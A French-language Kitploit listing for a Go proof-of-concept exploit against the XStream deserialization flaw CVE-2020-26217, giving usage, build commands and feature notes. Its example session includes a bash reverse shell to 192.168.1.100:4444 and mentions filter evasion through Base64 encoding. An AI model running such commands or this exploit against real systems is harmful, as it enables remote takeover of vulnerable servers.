Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStream反序列化的poc | Kitploit
Outils/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream反序列化的poc

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-26217 XStream RCE Exploit

Outil d'exploitation de la vulnérabilité d'exécution de code à distance dans XStream.

Description de la vulnérabilité

CVE-2020-26217 est une vulnérabilité de désérialisation dans la bibliothèque XStream. Un attaquant peut déclencher une exécution de code à distance en construisant des données XML malveillantes.

Versions concernées : XStream <= 1.4.13

Utilisation

root@kitploit:~
go run poc.go <URL_cible>

Exemple

root@kitploit:~
# Lancer l'outil
go run poc.go http://target.com:8080/?data

# En mode interactif, saisir des commandes
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Fonctionnalités

  • Exécution interactive de commandes
  • Analyse automatique des noms de paramètres URL
  • Encodage Base64 pour contourner le filtrage des caractères spéciaux
  • Prise en charge de HTTPS (vérification du certificat ignorée)

Compilation

root@kitploit:~
go build -o poc poc.go

Avertissement légal

Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. Ne l'utilisez pas à des fins illégales. L'utilisateur assume l'entière responsabilité légale.

Télécharger l’outil